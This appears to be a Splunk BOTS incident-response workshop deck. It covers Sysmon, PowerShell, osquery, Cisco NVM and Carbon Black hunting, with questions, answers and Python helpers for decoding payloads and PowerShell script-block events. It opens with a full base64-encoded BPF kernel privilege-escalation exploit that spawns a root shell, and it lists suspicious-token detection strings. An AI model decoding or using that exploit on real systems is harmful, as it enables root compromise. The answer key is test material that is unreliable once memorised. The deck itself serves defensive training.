W50IHNvY2tldHNbMl07CmludCBtYXBmZCwgcHJvZ2ZkOwoKY2hhciAqX19wcm9nID0gCSJceGI0XHgwOVx4MDBceDAwXHhmZlx4ZmZceGZmXHhmZiIKCQkiXHg1NVx4MDlceDAyXHgwMFx4ZmZceGZmXHhmZlx4ZmYiCgkJIlx4YjdceDAwXHgwMFx4MDBceDAwXHgwMFx4MDBceDAwIgoJCSJc
eDk1XHgwMFx4MDBceDAwXHgwMFx4MDBceDAwXHgwMCIKCQkiXHgxOFx4MTlceDAwXHgwMFx4MDNceDAwXHgwMFx4MDAiCgkJIlx4MDBceDAwXHgwMFx4MDBceDAwXHgwMFx4MDBceDAwIgoJCSJceGJmXHg5MVx4MDBceDAwXHgwMFx4MDBceDAwXHgwMCIKCQkiXHhiZlx4YTJceD
AwXHgwMFx4MDBceDAwXHgwMFx4MDAiCgkJIlx4MDdceDAyXHgwMFx4MDBceGZjXHhmZlx4ZmZceGZmIgoJCSJceDYyXHgwYVx4ZmNceGZmXHgwMFx4MDBceDAwXHgwMCIKCQkiXHg4NVx4MDBceDAwXHgwMFx4MDFceDAwXHgwMFx4MDAiCgkJIlx4NTVceDAwXHgwMVx4MDBceDAwX
HgwMFx4MDBceDAwIgoJCSJceDk1XHgwMFx4MDBceDAwXHgwMFx4MDBceDAwXHgwMCIKCQkiXHg3OVx4MDZceDAwXHgwMFx4MDBceDAwXHgwMFx4MDAiCgkJIlx4YmZceDkxXHgwMFx4MDBceDAwXHgwMFx4MDBceDAwIgoJCSJceGJmXHhhMlx4MDBceDAwXHgwMFx4MDBceDAwXH
gwMCIKCQkiXHgwN1x4MDJceDAwXHgwMFx4ZmNceGZmXHhmZlx4ZmYiCgkJIlx4NjJceDBhXHhmY1x4ZmZceDAxXHgwMFx4MDBceDAwIgoJCSJceDg1XHgwMFx4MDBceDAwXHgwMVx4MDBceDAwXHgwMCIKCQkiXHg1NVx4MDBceDAxXHgwMFx4MDBceDAwXHgwMFx4MDAiCgkJIlx4OTV
ceDAwXHgwMFx4MDBceDAwXHgwMFx4MDBceDAwIgoJCSJceDc5XHgwN1x4MDBceDAwXHgwMFx4MDBceDAwXHgwMCIKCQkiXHhiZlx4OTFceDAwXHgwMFx4MDBceDAwXHgwMFx4MDAiCgkJIlx4YmZceGEyXHgwMFx4MDBceDAwXHgwMFx4MDBceDAwIgoJCSJceDA3XHgwMlx4MDBceD
AwXHhmY1x4ZmZceGZmXHhmZiIKCQkiXHg2Mlx4MGFceGZjXHhmZlx4MDJceDAwXHgwMFx4MDAiCgkJIlx4ODVceDAwXHgwMFx4MDBceDAxXHgwMFx4MDBceDAwIgoJCSJceDU1XHgwMFx4MDFceDAwXHgwMFx4MDBceDAwXHgwMCIKCQkiXHg5NVx4MDBceDAwXHgwMFx4MDBceDAwX
HgwMFx4MDAiCgkJIlx4NzlceDA4XHgwMFx4MDBceDAwXHgwMFx4MDBceDAwIgoJCSJceGJmXHgwMlx4MDBceDAwXHgwMFx4MDBceDAwXHgwMCIKCQkiXHhiN1x4MDBceDAwXHgwMFx4MDBceDAwXHgwMFx4MDAiCgkJIlx4NTVceDA2XHgwM1x4MDBceDAwXHgwMFx4MDBceDAwIgoJC
SJceDc5XHg3M1x4MDBceDAwXHgwMFx4MDBceDAwXHgwMCIKCQkiXHg3Ylx4MzJceDAwXHgwMFx4MDBceDAwXHgwMFx4MDAiCgkJIlx4OTVceDAwXHgwMFx4MDBceDAwXHgwMFx4MDBceDAwIgoJCSJceDU1XHgwNlx4MDJceDAwXHgwMVx4MDBceDAwXHgwMCIKCQkiXHg3Ylx4YTJce
DAwXHgwMFx4MDBceDAwXHgwMFx4MDAiCgkJIlx4OTVceDAwXHgwMFx4MDBceDAwXHgwMFx4MDBceDAwIgoJCSJceDdiXHg4N1x4MDBceDAwXHgwMFx4MDBceDAwXHgwMCIKCQkiXHg5NVx4MDBceDAwXHgwMFx4MDBceDAwXHgwMFx4MDAiOwoKY2hhciBicGZfbG9nX2J1ZltMT0dfQl
VGX1NJWkVdOwoKc3RhdGljIGludCBicGZfcHJvZ19sb2FkKGVudW0gYnBmX3Byb2dfdHlwZSBwcm9nX3R5cGUsCgkJICBjb25zdCBzdHJ1Y3QgYnBmX2luc24gKmluc25zLCBpbnQgcHJvZ19sZW4sCgkJICBjb25zdCBjaGFyICpsaWNlbnNlLCBpbnQga2Vybl92ZXJzaW9uKSB7Cgl1bmlvbiBicGZfYXR
0ciBhdHRyID0gewoJCS5wcm9nX3R5cGUgPSBwcm9nX3R5cGUsCgkJLmluc25zID0gKF9fdTY0KWluc25zLAoJCS5pbnNuX2NudCA9IHByb2dfbGVuIC8gc2l6ZW9mKHN0cnVjdCBicGZfaW5zbiksCgkJLmxpY2Vuc2UgPSAoX191NjQpbGljZW5zZSwKCQkubG9nX2J1ZiA9IChfX3U2NClicGZfbG9nX2J
1ZiwKCQkubG9nX3NpemUgPSBMT0dfQlVGX1NJWkUsCgkJLmxvZ19sZXZlbCA9IDEsCgl9OwoKCWF0dHIua2Vybl92ZXJzaW9uID0ga2Vybl92ZXJzaW9uOwoKCWJwZl9sb2dfYnVmWzBdID0gMDsKCglyZXR1cm4gc3lzY2FsbChfX05SX2JwZiwgQlBGX1BST0dfTE9BRCwgJmF0dHIsIHNpemVvZihh
dHRyKSk7Cn0KCnN0YXRpYyBpbnQgYnBmX2NyZWF0ZV9tYXAoZW51bSBicGZfbWFwX3R5cGUgbWFwX3R5cGUsIGludCBrZXlfc2l6ZSwgaW50IHZhbHVlX3NpemUsCgkJICAgaW50IG1heF9lbnRyaWVzKSB7Cgl1bmlvbiBicGZfYXR0ciBhdHRyID0gewoJCS5tYXBfdHlwZSA9IG1hcF90eXBlLAoJC
S5rZXlfc2l6ZSA9IGtleV9zaXplLAoJCS52YWx1ZV9zaXplID0gdmFsdWVfc2l6ZSwKCQkubWF4X2VudHJpZXMgPSBtYXhfZW50cmllcwoJfTsKCglyZXR1cm4gc3lzY2FsbChfX05SX2JwZiwgQlBGX01BUF9DUkVBVEUsICZhdHRyLCBzaXplb2YoYXR0cikpOwp9CgpzdGF0aWMgaW50IGJwZl91cGRhdG
VfZWxlbSh1aW50NjRfdCBrZXksIHVpbnQ2NF90IHZhbHVlKSB7Cgl1bmlvbiBicGZfYXR0ciBhdHRyID0gewoJCS5tYXBfZmQgPSBtYXBmZCwKCQkua2V5ID0gKF9fdTY0KSZrZXksCgkJLnZhbHVlID0gKF9fdTY0KSZ2YWx1ZSwKCQkuZmxhZ3MgPSAwLAoJfTsKCglyZXR1cm4gc3lzY2FsbChfX05SX2
JwZiwgQlBGX01BUF9VUERBVEVfRUxFTSwgJmF0dHIsIHNpemVvZihhdHRyKSk7Cn0KCnN0YXRpYyBpbnQgYnBmX2xvb2t1cF9lbGVtKHZvaWQgKmtleSwgdm9pZCAqdmFsdWUpIHsKCXVuaW9uIGJwZl9hdHRyIGF0dHIgPSB7CgkJLm1hcF9mZCA9IG1hcGZkLAoJCS5rZXkgPSAoX191NjQpa2V
5LAoJCS52YWx1ZSA9IChfX3U2NCl2YWx1ZSwKCX07CgoJcmV0dXJuIHN5c2NhbGwoX19OUl9icGYsIEJQRl9NQVBfTE9PS1VQX0VMRU0sICZhdHRyLCBzaXplb2YoYXR0cikpOwp9CgpzdGF0aWMgdm9pZCBfX2V4aXQoY2hhciAqZXJyKSB7CglmcHJpbnRmKHN0ZGVyciwgImVycm9yOiAlc1xuIi
wgZXJyKTsKCWV4aXQoLTEpOwp9CgpzdGF0aWMgdm9pZCBwcmVwKHZvaWQpIHsKCW1hcGZkID0gYnBmX2NyZWF0ZV9tYXAoQlBGX01BUF9UWVBFX0FSUkFZLCBzaXplb2YoaW50KSwgc2l6ZW9mKGxvbmcgbG9uZyksIDMpOwoJaWYgKG1hcGZkIDwgMCkKCQlfX2V4aXQoc3RyZXJyb3Io
ZXJybm8pKTsKCglwcm9nZmQgPSBicGZfcHJvZ19sb2FkKEJQRl9QUk9HX1RZUEVfU09DS0VUX0ZJTFRFUiwKCQkJKHN0cnVjdCBicGZfaW5zbiAqKV9fcHJvZywgUFJPR1NJWkUsICJHUEwiLCAwKTsKCglpZiAocHJvZ2ZkIDwgMCkKCQlfX2V4aXQoc3RyZXJyb3IoZXJybm8pKTsKCglpZihzb2NrZX
RwYWlyKEFGX1VOSVgsIFNPQ0tfREdSQU0sIDAsIHNvY2tldHMpKQoJCV9fZXhpdChzdHJlcnJvcihlcnJubykpOwoKCWlmKHNldHNvY2tvcHQoc29ja2V0c1sxXSwgU09MX1NPQ0tFVCwgU09fQVRUQUNIX0JQRiwgJnByb2dmZCwgc2l6ZW9mKHByb2dmZCkpIDwgMCkKCQlfX2V4aXQoc3RyZXJyb3
IoZXJybm8pKTsKfQoKc3RhdGljIHZvaWQgd3JpdGVtc2codm9pZCkgewoJY2hhciBidWZmZXJbNjRdOwoKCXNzaXplX3QgbiA9IHdyaXRlKHNvY2tldHNbMF0sIGJ1ZmZlciwgc2l6ZW9mKGJ1ZmZlcikpOwoKCWlmIChuIDwgMCkgewoJCXBlcnJvcigid3JpdGUiKTsKCQlyZXR1cm47Cgl9CglpZiAobiAhPS
BzaXplb2YoYnVmZmVyKSkKCQlmcHJpbnRmKHN0ZGVyciwgInNob3J0IHdyaXRlOiAlbHVcbiIsIG4pOwp9CgojZGVmaW5lIF9fdXBkYXRlX2VsZW0oYSwgYiwgYykgXAoJYnBmX3VwZGF0ZV9lbGVtKDAsIChhKSk7IFwKCWJwZl91cGRhdGVfZWxlbSgxLCAoYikpOyBcCglicGZfdXBkYXRlX2VsZW0oM
iwgKGMpKTsgXAoJd3JpdGVtc2coKTsKCnN0YXRpYyB1aW50NjRfdCBnZXRfdmFsdWUoaW50IGtleSkgewoJdWludDY0X3QgdmFsdWU7CgoJaWYgKGJwZl9sb29rdXBfZWxlbSgma2V5LCAmdmFsdWUpKQoJCV9fZXhpdChzdHJlcnJvcihlcnJubykpOwoKCXJldHVybiB2YWx1ZTsKfQoKc3RhdGljIHV
pbnQ2NF90IF9fZ2V0X2ZwKHZvaWQpIHsKCV9fdXBkYXRlX2VsZW0oMSwgMCwgMCk7CgoJcmV0dXJuIGdldF92YWx1ZSgyKTsKfQoKc3RhdGljIHVpbnQ2NF90IF9fcmVhZCh1aW50NjRfdCBhZGRyKSB7CglfX3VwZGF0ZV9lbGVtKDAsIGFkZHIsIDApOwoKCXJldHVybiBnZXRfdmFsdWUoMik7Cn0
KCnN0YXRpYyB2b2lkIF9fd3JpdGUodWludDY0X3QgYWRkciwgdWludDY0X3QgdmFsKSB7CglfX3VwZGF0ZV9lbGVtKDIsIGFkZHIsIHZhbCk7Cn0KCnN0YXRpYyB1aW50NjRfdCBnZXRfc3AodWludDY0X3QgYWRkcikgewoJcmV0dXJuIGFkZHIgJiB+KDB4NDAwMCAtIDEpOwp9CgpzdGF0aWMgdm
9pZCBwd24odm9pZCkgewoJdWludDY0X3QgZnAsIHNwLCB0YXNrX3N0cnVjdCwgY3JlZHB0ciwgdWlkcHRyOwoKCWZwID0gX19nZXRfZnAoKTsKCWlmIChmcCA8IFBIWVNfT0ZGU0VUKQoJCV9fZXhpdCgiYm9ndXMgZnAiKTsKCQoJc3AgPSBnZXRfc3AoZnApOwoJaWYgKHNwIDwgUEhZU19PR
kZTRVQpCgkJX19leGl0KCJib2d1cyBzcCIpOwoJCgl0YXNrX3N0cnVjdCA9IF9fcmVhZChzcCk7CgoJaWYgKHRhc2tfc3RydWN0IDwgUEhZU19PRkZTRVQpCgkJX19leGl0KCJib2d1cyB0YXNrIHB0ciIpOwoKCXByaW50ZigidGFza19zdHJ1Y3QgPSAlbHhcbiIsIHRhc2tfc3RydWN0KTsKCgljcmVkcHRyID
0gX19yZWFkKHRhc2tfc3RydWN0ICsgQ1JFRF9PRkZTRVQpOyAvLyBjcmVkCgoJaWYgKGNyZWRwdHIgPCBQSFlTX09GRlNFVCkKCQlfX2V4aXQoImJvZ3VzIGNyZWQgcHRyIik7CgoJdWlkcHRyID0gY3JlZHB0ciArIFVJRF9PRkZTRVQ7IC8vIHVpZAoJaWYgKHVpZHB0ciA8IFBIWVNfT0ZGU0VUK
QoJCV9fZXhpdCgiYm9ndXMgdWlkIHB0ciIpOwoKCXByaW50ZigidWlkcHRyID0gJWx4XG4iLCB1aWRwdHIpOwoJX193cml0ZSh1aWRwdHIsIDApOyAvLyBzZXQgYm90aCB1aWQgYW5kIGdpZCB0byAwCgoJaWYgKGdldHVpZCgpID09IDApIHsKCQlwcmludGYoInNwYXduaW5nIHJvb3Qgc2hlbGxcb
iIpOwoJCXN5c3RlbSgiL2Jpbi9iYXNoIik7CgkJZXhpdCgwKTsKCX0KCglfX2V4aXQoIm5vdCB2dWxuZXJhYmxlPyIpOwp9CgppbnQgbWFpbihpbnQgYXJnYywgY2hhciAqKmFyZ3YpIHsKCXByZXAoKTsKCXB3bigpOwoKCXJldHVybiAwOwp9 >> /tmp/colonel"

Question #5
Try It Yourself!

The system being referenced in the previous command listing has had something called
“colonel” compiled on it and executed. What is it?

A privilege escalation kernel exploit: the base64 that is echoed into /tmp/colonel decodes to C source that describes itself as an Ubuntu 16.04.4 kernel privilege escalation, which was then compiled and run on the target.


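Decoding that command line programmatically, as an added example (not code from the deck or from Splunk): the regex stands in for the rex step in the hint, the 108-character base64 prefix is copied from the listing above (it decodes to the file's header comment), and the rest of the command line around it is reconstructed from the same listing. Decoding the full blob the same way yields a C program that includes <linux/bpf.h> and calls system("/bin/bash") at the end, which is why the answer is a kernel privilege escalation exploit.

```python
import base64
import re

# Regex standing in for the "rex" step in the hint: capture the token after
# "echo " and the redirect target after ">>".
PAYLOAD_RE = re.compile(r'echo\s+([A-Za-z0-9+/=]+)\s*>>\s*([^\s"]+)')

# Opening 108 characters of the base64 blob shown in the listing above (copied
# from the page, cut at a 4-character boundary so it decodes cleanly).
B64_HEAD = ("LyoKICogVWJ1bnR1IDE2LjA0LjQga2VybmVsIHByaXYgZXNjCiAqCiAqIGFsbCBjcmVkaXRz"
            "IHRvIEBibGVpZGwKICogLSB2bmlrCiAqLwoK")

# Constructed Sysmon CommandLine value in the shape of the listing above, with
# the shortened payload in place of the full one.
SAMPLE_CMDLINE = (
    '"C:\\windows\\temp\\unziped\\lsof-master\\iexeplorer.exe" '
    'http://192.168.9.30:8080/frothlyinventory/showcase.action '
    '"echo ' + B64_HEAD + ' >> /tmp/colonel"'
)

# Strings worth looking for in the decoded text; the first is what the payload
# says about itself, the other two appear later in the full blob on the page.
MARKERS = {
    "kernel priv esc": "self-described kernel privilege escalation",
    "#include <linux/bpf.h>": "talks to the kernel through the bpf() syscall",
    'system("/bin/bash")': "spawns a shell once the exploit has succeeded",
}


def extract_payload(cmdline):
    """Return (decoded_text, target_path) for an 'echo <b64> >> file' command,
    or None when the command line carries no such payload."""
    m = PAYLOAD_RE.search(cmdline)
    if not m:
        return None
    b64, target = m.groups()
    # Re-pad: field extraction or line wrapping can drop trailing '='.
    b64 += "=" * (-len(b64) % 4)
    text = base64.b64decode(b64, validate=True).decode("utf-8", errors="replace")
    return text, target


def classify(decoded_text):
    """List the MARKERS descriptions that apply to the decoded payload."""
    return [desc for marker, desc in MARKERS.items() if marker in decoded_text]


if __name__ == "__main__":
    text, target = extract_payload(SAMPLE_CMDLINE)
    print("written to:", target)
    print(text)
    print("findings:", classify(text))
```

Re-padding matters because Splunk field extraction or slide wrapping can lose trailing "=" characters; validate=True makes the decoder reject anything outside the base64 alphabet instead of silently skipping it, which is what you want when the regex was too generous.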

PowerShell
Logging

What are they? Should we collect?

• 4104 (Script Block Logging) = Almost always yes
• 4103 (Module Logging) = Sometimes…
• 800 = same as 4103!
• 50x = "largely useless": basically logs starts and stops
• 4100 = Sure, minor volume

https://www.eventsentry.com/blog/2018/01/powershell-p0wrh11-securing-powershell.html

But do 4104 events "automatically" warn about suspicious script blocks? Could we collect only those?

Almost 200 strings are "Warning" worthy: PowerShell ships its own list of suspicious signatures in CompiledScriptBlock.cs, and a script block containing any of them is logged at Level 3 (Warning) instead of Verbose.

https://github.com/PowerShell/PowerShell/blob/master/src/System.Management.Automation/engine/runtime/CompiledScriptBlock.cs
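Two things a 4104 consumer has to handle, shown as an added Python example (not Splunk's or the deck's code): a long script block is written as several 4104 events that share a ScriptBlockId and are numbered by MessageNumber/MessageTotal, so a signature that straddles a chunk boundary is invisible until the chunks are joined; and the Level field (3 = Warning, 5 = Verbose) is where PowerShell's own suspicious-string check lands. The events are constructed in the channel's XML layout, SUSPICIOUS is an assumed subset of the CompiledScriptBlock.cs list matched case-insensitively, and the host names echo the hands-on that follows. The same code serves the Script Block Logging question (Hands-On Q4) below.

```python
import xml.etree.ElementTree as ET
from collections import defaultdict
from xml.sax.saxutils import escape

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
LEVELS = {3: "Warning", 5: "Verbose"}

# A handful of the strings PowerShell treats as suspicious; assumed subset of
# the list in CompiledScriptBlock.cs.
SUSPICIOUS = ["Add-Type", "DllImport", "FromBase64String", "EncodedCommand",
              "Bypass", "AllocHGlobal", "Mimikatz", "Lsass"]


def make_4104(computer, level, sb_id, num, total, text):
    """Constructed 4104 event in the layout Windows writes to the
    Microsoft-Windows-PowerShell/Operational channel (sample, not a capture)."""
    return (
        f'<Event xmlns="{NS["e"]}"><System>'
        f'<Provider Name="Microsoft-Windows-PowerShell"/><EventID>4104</EventID>'
        f'<Level>{level}</Level><Computer>{computer}</Computer></System><EventData>'
        f'<Data Name="MessageNumber">{num}</Data><Data Name="MessageTotal">{total}</Data>'
        f'<Data Name="ScriptBlockText">{escape(text)}</Data>'
        f'<Data Name="ScriptBlockId">{sb_id}</Data><Data Name="Path"></Data>'
        f'</EventData></Event>'
    )


SB_A = "a1b2c3d4-0000-0000-0000-000000000001"   # two chunks, suspicious
SB_B = "a1b2c3d4-0000-0000-0000-000000000002"   # one chunk, benign
SB_C = "a1b2c3d4-0000-0000-0000-000000000003"   # chunk 2 of 2 never arrived

SAMPLE_EVENTS = [
    make_4104("AGRADY-L", 3, SB_A, 1, 2,
              '$code = \'[DllImport("kernel32.dll")] public static extern IntPtr '
              'GetCurrentProcess();\'; Add-Ty'),
    make_4104("AGRADY-L", 3, SB_A, 2, 2,
              'pe -MemberDefinition $code -Name K32 -Namespace Win32'),
    make_4104("JWORTOSKI-L", 5, SB_B, 1, 1,
              'Get-Process | Where-Object { $_.CPU -gt 100 }'),
    make_4104("AGRADY-L", 3, SB_C, 1, 2, 'Invoke-Expression $payload'),
]


def parse_4104(xml_text):
    """Pull the System and EventData fields a collector needs out of one event."""
    root = ET.fromstring(xml_text)
    data = {d.get("Name"): (d.text or "")
            for d in root.iterfind("e:EventData/e:Data", NS)}
    return {
        "computer": root.findtext("e:System/e:Computer", namespaces=NS),
        "level": int(root.findtext("e:System/e:Level", namespaces=NS)),
        "id": data["ScriptBlockId"],
        "num": int(data["MessageNumber"]),
        "total": int(data["MessageTotal"]),
        "text": data["ScriptBlockText"],
    }


def reassemble(events):
    """Join chunked script blocks by ScriptBlockId in MessageNumber order.
    Blocks with missing chunks are reported as incomplete, never truncated."""
    parts, meta = defaultdict(dict), {}
    for ev in events:
        parts[ev["id"]][ev["num"]] = ev["text"]
        meta[ev["id"]] = ev
    complete, incomplete = {}, []
    for sb_id, chunks in parts.items():
        total = meta[sb_id]["total"]
        if len(chunks) != total:
            incomplete.append(sb_id)
            continue
        complete[sb_id] = {
            "computer": meta[sb_id]["computer"],
            "level": LEVELS.get(meta[sb_id]["level"], str(meta[sb_id]["level"])),
            "text": "".join(chunks[i] for i in range(1, total + 1)),
        }
    return complete, incomplete


def suspicious_tokens(text):
    """Tokens from SUSPICIOUS present in the script text (case-insensitive)."""
    low = text.lower()
    return [t for t in SUSPICIOUS if t.lower() in low]


if __name__ == "__main__":
    blocks, missing = reassemble(parse_4104(x) for x in SAMPLE_EVENTS)
    for sb_id, b in blocks.items():
        print(b["computer"], b["level"], sb_id, suspicious_tokens(b["text"]))
    print("incomplete:", missing)
```

Scanning chunk by chunk finds only DllImport in the first block; the joined text also reveals Add-Type. In Splunk the equivalent is to group by ScriptBlockId before searching ScriptBlockText, and to treat Level=Warning as a cheap first filter rather than the whole detection.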

Hands-On:
Sysmon and
PowerShell Logs

Question #1
Pivoting from Sysmon Events to PowerShell Events

A pdf was created on a workstation. What makes this file creation puzzling is that the file
was created from a PowerShell process. What host was the file created on? What is the
name of the file?

Hints
• index – main (our most recent BOTS dataset is in “main” so be sure to use this…)
• sourcetype – xmlwineventlog:microsoft-windows-sysmon/operational (Sysmon)
• File Creation in Sysmon is Event Code 11

Question #1
Pivoting from Sysmon Events to PowerShell Events

A pdf was created on a workstation. What makes this file creation puzzling is that the file
was created by the PowerShell process. What host was the file created on? What is the
name of the file?

Host: AGRADY-L

Filename: 2019-BrewCon-Sessions.pdf

Question #2
Pivoting from Sysmon Events to PowerShell Events

Have we seen this file elsewhere in our Splunk instance? Are there any files associated
with this file that might be suspicious? What sourcetypes do we see referenced?

Hints
• index – main

Question #2
Pivoting from Sysmon Events to PowerShell Events

Have we seen this file elsewhere in our Splunk instance? Are there any files associated
with this file that might be suspicious? What sourcetypes do we see referenced?

We only see one reference to the pdf but we do see other similar filename references, including two .LNK files

Sourcetypes: WinEventLog:Microsoft-Windows-Powershell/Operational,
XmlWinEventLog:Microsoft-Windows-Sysmon/Operational, WinEventLog,
bit9:carbonblack:json, wdtap:alerts, stream:http, stream:ip, fgt_utm, xmlwineventlog

Question #3
Pivoting from Sysmon Events to PowerShell Events

Because we initially saw the pdf being created by PowerShell, perhaps we can learn more
from PowerShell itself. What hosts have visibility into PowerShell and this pdf?

Hint
• Continue with the previous search but look specifically for PowerShell events

Question #3
Pivoting from Sysmon Events to PowerShell Events

Because we initially saw the pdf being created by PowerShell, perhaps we can learn more
from PowerShell itself. What hosts have visibility into PowerShell and this pdf?

Hosts: AGRADY-L, JWORTOSKI-L



Question #4
Pivoting from Sysmon Events to PowerShell Events

Script Block Logging has a specific event ID in PowerShell events (4104, per the event ID list in the PowerShell Logging section above). Use that event ID to find any indicators that might be useful to monitor for in the future.

Hint
• Continue with the previous search
• Make sure to expand events to see the entirety of the events

Question #4
Pivoting from Sysmon Events to PowerShell Events

Script Block Logging has a specific event ID in PowerShell events (4104, per the event ID list in the PowerShell Logging section above). Use that event ID to find any indicators that might be useful to monitor for in the future.

What could we do with the indicators we uncovered?

osquery
Because “not everyone runs Windows.”

You Likely Have Some Macs

(Otherwise, why are you doing this module?)

(Chart: 2016 JAMF "Managing Apple Devices in the Enterprise")

(Chart: 2017 McAfee)

You could, and should, have a traditional endpoint A/V solution on your corporate MacBooks.

But what could you do with Splunk?

osquery
https://osquery.io/

Query your endpoints via SQL-like syntax for gobs of OS, IR, and forensic info

Linux, MacOS, Windows, etc.

Open source

JSON-based log messages

Started by Facebook

FIM!

Community-Contributed Query Packs & Guidance

osquery

"Query Con" was held – great resource for learning about basic and advanced topics:
• https://www.youtube.com/playlist?list=PLlSdCcsTOu5STvaoPlr-PJE-zbYmlAGrX

Luke Murphey released a community app that acts as a management server for osquery clients – ask queries right from the Search Head!
• https://splunkbase.splunk.com/app/3902/

We continue to encounter large corporations using osquery + Splunk, especially for non-Windows endpoints

osquery
Sample Configuration: BOTS

Default packs for Linux OS
• https://github.com/facebook/osquery/tree/master/pack

Disabled native Linux auditd and used osquery's hook into it

Interval collections between 60 and 300 seconds (note that _events tables have full activity fidelity)

Local UF to collect JSON output and stream into Splunk

root@hoth:/usr/share/osquery/packs# more fims.conf
{
  "queries": {
    "file_events": {
      "query": "select * from file_events;",
      "removed": false,
      "interval": 300
    }
  },
  "file_paths": {
    "homes": [
      "/root/.ssh/%%",
      "/home/%/.ssh/%%"
    ],
    "etc": [
      "/etc/%%"
    ],
    "home": [
      "/home/%%"
    ],
    "tmp": [
      "/tmp/%%"
    ]
  }
}

Splunk App for OSquery
https://splunkbase.splunk.com/app/3278/

Browse data provided by default osquery packs

Dashboards for File Integrity Monitoring, Process/Port activity, Rare Events for security investigation

Community App written by Thomas Przelomiec (Splunk)

Developed with osquery 1.7.3

Hands-On:
osquery

Question #1
Command Line with osquery

We are made aware that there is potentially malicious activity targeting a server named
HOTH by a user called tomcat8. This is a Linux machine and we want to view commands
being run on the system. What kinds of activities is this user generating?

Hints
• index - botsv3
• sourcetype - osquery:results

Commands executed
• columns.cmdline

Paths
• columns.path

Question #1
Command Line with osquery

We are made aware that there is potentially malicious activity targeting a server named
HOTH by a user called tomcat8. This is a Linux machine and we want to view commands
being run on the system. What kinds of activities is this user generating?

Activities Seen
• New user creation
• Netcat
• Execution of colonelnew – whatever that is?
• Inspecting /etc/passwd
• Others?

Question #2
File Integrity Monitoring - Part 1

The adversary gained root privileges on HOTH and made external connections. We need
to think about what might be exfiltrated. What files are being manipulated locally on
HOTH?

Hints
• index – botsv3
• sourcetype - osquery:results
• Look at the different osquery modules (name) and select the one that is most likely going to help us when it comes to file integrity monitoring

Question #2
File Integrity Monitoring - Part 1

The adversary gained root privileges on HOTH and made external connections. We need
to think about what might be exfiltrated. What files are being manipulated locally on
HOTH?

Question #3
File Integrity Monitoring – Part 2

The adversary gained root privileges on HOTH and made external connections. We need
to think about what might be exfiltrated. What files are being manipulated locally on
HOTH?

How can we refine this further?

What files might require additional analysis?



Question #3
File Integrity Monitoring - Part 2

The adversary gained root privileges on HOTH and made external connections. We need
to think about what might be exfiltrated. What files are being manipulated locally on
HOTH?

How can we refine this further?


• Use the search or regex command to remove extraneous files

What files might require additional analysis?


• Loot.txt
• Blargh.tgz
• Others?

Upon further review…


Learn more about osquery

Cisco AnyConnect (NVM)

Cisco AnyConnect Network Visibility Module

Cisco NVM Details

Windows, macOS, Android/Knox

Does not need to be connected to VPN to collect

Processes mapped to network activity (but must generate network activity)

Needs an Apex license (but you can try it out)

Cisco-supported Splunk App contains a basic IPFIX collector, or use your own

Data comes to Splunk from collector via Syslog

Special Splunk pricing available with "CESA" solution, direct from Cisco

https://www.cisco.com/c/en/us/support/docs/security/anyconnect-secure-mobility-client/200600-Install-and-Configure-Cisco-Network-Visi.html

Hands-On:
Cisco Anyconnect NVM

Question #1
Web Browsing

One user navigated to www.brewersassociation.org using Chrome. Who was that user?

Hints
• index – botsv3
• source - cisconvmflowdata

Question #1
Web Browsing

One user navigated to www.brewersassociation.org using Chrome. Who was that user?

This wasn’t designed to stump you but to highlight the fidelity of the data collected.

Mallory Kraeusen

Question #2
Network Traffic

Frothly was spearphished, and the fake domain in the phish was “frothly.com”. If we
review our NVM events, we can see two IP addresses and one user associated with traffic
destined there. What are the total bytes_in and bytes_out for each address?

Hints
• index - botsv3
• source - Cisco NVM flow data
• Just because you have a domain doesn’t mean you shouldn’t consider subdomains as well

Question #2
Network Traffic

Frothly was spearphished, and the fake domain in the phish was "frothly.com". If we review our NVM events, we can see two IP addresses and one user associated with traffic destined there. What are the total bytes_in and bytes_out for each address?

VMware Carbon Black

CB EDR

EDR Solution

JSON Output

CIM Compliant
• Endpoint
• Network Traffic
• Intrusion Detection

Splunk monitors the JSON that the CB Event Forwarder writes to disk, to an S3 bucket, or sends over the network.

https://github.com/carbonblack/cb-event-forwarder

Hands-On:
Sysmon Event 22 (DNS)
and CB

Challenge Question
Combining Sysmon DNS Logging & CB Process Execution

There is evidence in the logs that the adversary has been on the Frothly network before. If
you trace that evidence, you will identify the FQDN that the adversary communicates with.
Once you identify this, you can pivot to the binary calling out and identify the binary and a
unique characteristic about how it communicates. Focus on laptops during the timeframe
between August 1-3, 2019.

Hints
• index - main
• Start with DNS events in Sysmon
• Laptops all have a host value that ends in “-L”
• The adversary utilizes dynamic DNS; a lookup exists called dynamic-dns.csv

Question #1
Generate a Listing of Binaries that Made DNS Queries

Using the hints below, generate a list with a sorted count of the binaries executed that
make DNS queries.

Hints
• index - main
• Start with DNS events in Sysmon (xmlwineventlog:microsoft-windows-sysmon/operational)
• Laptops all have a host value that ends in “-L”
• Timeframe - Between August 1-3, 2019

Question #1
Generate a Listing of Binaries that Made DNS Queries

Using the hints below, generate a list with a sorted count of the binaries executed that
make DNS queries

Now that we have the domains, where might we want to go from here?

Question #2
Extracting Domains

Tighten our list of binaries and DNS queries to return the domain name that exists in the queries. Don't forget to deduplicate the query list.

URL Toolbox: https://splunkbase.splunk.com/app/2734/

Hints
• Build off our previous search
• There are lots of options in URL toolbox but today we will
use the following two commands together in our search
– | eval list="iana"
– | `ut_parse_extended(<fieldname>,list)`

Question #2
Extracting Domains

Tighten our list of binaries and DNS queries to return the domain name that exists in the queries. Don't forget to deduplicate the query list.

Now that we have a list of domains, can we compare them to our list of Dynamic DNS providers?

Question #3
Comparing Domains

Use our newly parsed domains to compare them to the list of Dynamic DNS providers
(dynamic-dns.csv) and determine if there are any Dynamic DNS domains in our events.

Hints
• Build off our previous search
• The lookup command will help provide that matching
• The inputlookup command can help you view the contents of a lookup
• Limit your search to just fields you feel are relevant

Question #3
Comparing Domains

Use our newly parsed domains to compare them to the list of Dynamic DNS providers
(dynamic-dns.csv) and determine if there are any Dynamic DNS domains in our events.

frenchconnection.servebeer.com
One domain was associated with a Dynamic DNS provider…servebeer.com

But how does this tie back to the binary executed?



Question #4
Associate Dynamic DNS to Binary

With our newly found suspicious QueryName value, generate a list of binaries and hosts
with counts that are associated with this domain.

Hints
• Leverage our previous search and simplify it

Question #4
Associate Dynamic DNS to Binary

With our newly found suspicious QueryName value, generate a list of binaries and hosts
with counts that are associated with this domain.

Where can we find information about these Image values?

Question #5
Identify Binary Characteristics

What unique characteristic does one of those Image (binary) values have that would
validate that the adversary has been on the Frothly network in the past?

Hints
• This data does not exist in Sysmon, use CarbonBlack instead
